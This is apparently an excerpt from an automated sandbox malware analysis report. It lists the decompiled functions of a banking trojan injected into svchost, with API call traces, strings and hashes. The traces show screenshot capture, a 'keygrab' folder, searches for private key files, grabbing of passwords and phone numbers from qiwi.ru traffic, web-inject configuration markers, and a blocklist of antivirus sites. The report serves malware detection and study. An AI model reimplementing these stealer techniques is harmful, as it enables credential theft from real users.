                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8DE40,02CBDAD8,00000000,00000000), ref: 02C8DC8E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8DCA6
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8DCB7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                            • String ID: 6D1DA2CA$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                            • API String ID: 448721894-1513253894
                                                                                                                                                                                                            • Opcode ID: 400d5898fa59baa4187225590c2ebc197c0e41cae4a2fb2c7564df7c8e919a4f
                                                                                                                                                                                                            • Instruction ID: 8815aab9caae678beb954c7b7f2384fd36a2e34a63283f0a9db963741f17374a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 400d5898fa59baa4187225590c2ebc197c0e41cae4a2fb2c7564df7c8e919a4f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24712871A406955FD7129F389C58BEABBE8EF85305F14C6D4E98BC7240DB70CA49CB90
                                                                                                                                                                                                            Function 02C80EE0 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 187filewindowmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 02C80EF3
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C80F04
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02C80F19
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C80F2E
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02C80F48
                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02C80F76
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 02C80F8C
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32 ref: 02C80FF0
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02C81001
                                                                                                                                                                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02C81020
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C8131E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C8103C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02C8107D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02C8109A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C810B6
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02C810BD
                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 02C810C4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C810DC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C810EE
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C810FB
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 02C81107
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02C81113
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileGlobal$CreateObjectWrite$CompatibleHandleRelease$AllocBitmapBitsCloseCursorDeleteFreeInformationLockSelectUnlock
                                                                                                                                                                                                            • String ID: ($6
                                                                                                                                                                                                            • API String ID: 1662540191-4149066357
                                                                                                                                                                                                            • Opcode ID: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                            • Instruction ID: f65ab8c0bae4c2ed15dfae3902ced4cd321ad6f1f88fe3bb7d017c44247e62ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90612871944340AFD311DF65DC89B6BBBE8EFC8754F048A1CFA4993280DBB4D9058BA2
                                                                                                                                                                                                            Function 02C756F0 Relevance: 36.1, APIs: 12, Strings: 12, Instructions: 71COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avast.com,?,?,02C7585C), ref: 02C7570B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kaspersky,?,?,02C7585C), ref: 02C7571B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,drweb,?,?,02C7585C), ref: 02C75727
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,eset.com,?,?,02C7585C), ref: 02C75733
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,antivir,?,?,02C7585C), ref: 02C7573F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avira,?,?,02C7585C), ref: 02C7574B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virustotal,?,?,02C7585C), ref: 02C75757
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virusinfo,?,?,02C7585C), ref: 02C75763
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02C7585C), ref: 02C7576F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,trendsecure,?,?,02C7585C), ref: 02C7577B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,anti-malware,?,?,02C7585C), ref: 02C75787
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02C7585C), ref: 02C75793
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                            • API String ID: 0-375433535
                                                                                                                                                                                                            • Opcode ID: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                            • Instruction ID: d090923e131477c12c4cec90647dd52a86651fcb6ca3814de5afc97d4e454eb4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 260139D63A67E6717A73317A0C92F9F4A8C4ED1CC8B410675FC09E2105E7A6DB0308B5
                                                                                                                                                                                                            Function 02C71000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 156memorythreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C7149C,00000000,?), ref: 02C7101B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,7556F570,?,02C7149C,00000000,?), ref: 02C7103E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71045
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C71055
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7556F570,?,02C7149C,00000000,?), ref: 02C71073
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C7149C,00000000,?), ref: 02C71093
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C906E0,00000000,00000000,00000000), ref: 02C710A3
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8F1B0,00000000,00000000,00000000), ref: 02C710D0
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\secrets.key,?,?,02C7149C,00000000,?), ref: 02C710EC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,sign.key,?,02C7149C,00000000,?), ref: 02C71102
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C911C0,00000000,00000000,00000000), ref: 02C7111B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,02C7149C,00000000,?), ref: 02C7112F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71140
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71155
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71158
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71164
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71167
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                            • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                            • API String ID: 3254303593-2345338882
                                                                                                                                                                                                            • Opcode ID: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                            • Instruction ID: 4ba0e2f269905619e1da183914577106412ee6c3aa111e834bdfd4dedbef0bba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A741E731A401A17B9B326A665C8CEAB7B7CDFC6F94F088719F919A7040DB71C611C6B0
                                                                                                                                                                                                            Function 02C903A0 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 129stringthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C903E9
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C903FC
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C9040F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0BC), ref: 02C9043D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0BC), ref: 02C90473
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,6D1DA0BC), ref: 02C90488
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90492
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C9049A
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C904AB
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C904B2
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C904BF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90540,00000000,00000000,00000000), ref: 02C90508
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C90520
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90531
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakeSystemThreadUser
                                                                                                                                                                                                            • String ID: 6D1DA0BC$GET $pass.txt$password=$phone=$w.qiwi.ru
                                                                                                                                                                                                            • API String ID: 554474407-672413753
                                                                                                                                                                                                            • Opcode ID: edd3454b842262869fdc0c67ea75b0bb88a63f68ee895313ac0426a4e152f567
                                                                                                                                                                                                            • Instruction ID: 2a174f549657d50b6b9ead6a098b81d6fee8c9a1354c359d70f9939a41d377c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: edd3454b842262869fdc0c67ea75b0bb88a63f68ee895313ac0426a4e152f567
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD415931E4025D9BEF218E34AC5CBEB7BACAF81705F244698F88597140EB70D685CB95
                                                                                                                                                                                                            Function 02C8FA10 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,76C0BF00), ref: 02C8FA40
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,76C0BF00), ref: 02C8FA81
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,76C0BF00), ref: 02C8FA8B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8FA93
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8FAA4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,76C0BF00), ref: 02C8FAAB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02C8FAEA
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,76C0BF00), ref: 02C8FAF7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,76C0BF00), ref: 02C8FB40
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,76C0BF00), ref: 02C8FB5C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02C8FB79
                                                                                                                                                                                                              • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75495CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                              • Part of subcall function 02C97B50: RtlAllocateHeap.NTDLL(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                              • Part of subcall function 02C97B50: memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                              • Part of subcall function 02C97B50: CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                              • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                              • Part of subcall function 02C97B50: HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                              • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                              • Part of subcall function 02C97B50: HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,76C0BF00), ref: 02C8FBA8
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,76C0BF00), ref: 02C8FBC7
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?,76C0BF00), ref: 02C8FC2B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,76C0BF00), ref: 02C8FC38
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75495CE0), ref: 02C97D61
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: _snprintf.MSVCRT ref: 02C97D7D
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: LocalFree.KERNEL32(00000000), ref: 02C97D99
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DD8
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DE6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$FreePathProcess$AllocAttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminAllocateCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                            • String ID: 6D1DA0AA$\$inter.zip$path.txt
                                                                                                                                                                                                            • API String ID: 3271220685-2446218553
                                                                                                                                                                                                            • Opcode ID: 2cffffbe691cc65060450dcf91376301718293bd22c808996af54d038fe893d7
                                                                                                                                                                                                            • Instruction ID: 9bb7c9631274bbb94ac3368ab62ddaff185e6de9522194c02445509fab95a5b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cffffbe691cc65060450dcf91376301718293bd22c808996af54d038fe893d7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 036178309406855FDB22DB249CA8BFBBBE9AF85304F5086D8E989D7150DB70DA89CB50
                                                                                                                                                                                                            Function 02C811D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C81130: memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                              • Part of subcall function 02C81130: GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                              • Part of subcall function 02C81130: GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                              • Part of subcall function 02C81130: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD858,?,?), ref: 02C81206
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02C81234
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,?), ref: 02C81248
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C81259
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8125F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C81268
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C81279
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C81283
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,keygrab), ref: 02C81295
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C812A0
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C812A6
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C812AE
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C812BF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C812C6
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02C812D3
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C81303
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD858,?), ref: 02C81323
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                            • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                            • API String ID: 2122597915-4222822809
                                                                                                                                                                                                            • Opcode ID: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                            • Instruction ID: f38ad4d4ce2a83df3e94e43d01db13399269dc43d253f1200e0522f9340ea6d4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9531C2759402599BDB11EBB4DC48BDA77BCEF88305F088A94E589C3000DFB0DA96CF90
                                                                                                                                                                                                            Function 02C80240 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02CBD840,00000000,00000000,75449E60,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C80250
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802B8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802BF
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8033F
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C80359
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C80373
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8038D
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C803B7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02C803D4
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C803DB
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C80504
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8053C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8053F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8054C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8054F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02CBD840,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C8055A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                            • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                            • API String ID: 2387113551-2328515424
                                                                                                                                                                                                            • Opcode ID: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                            • Instruction ID: 862d923f2d4cfc4ddbe5a02576eeefa2444832840683b132483696eb5dc3c8e8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BA1E2719447419FDB22DF34C8947A6BFE5AF85308F14C6ACD88A8B242EB71D60DCB91
                                                                                                                                                                                                            Function 02C8D268 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 235COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354), ref: 02C8D284
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA354,?,?), ref: 02C8D389
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D3C3
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8D3CD
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8D3D5
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D3E4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8D3EB
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
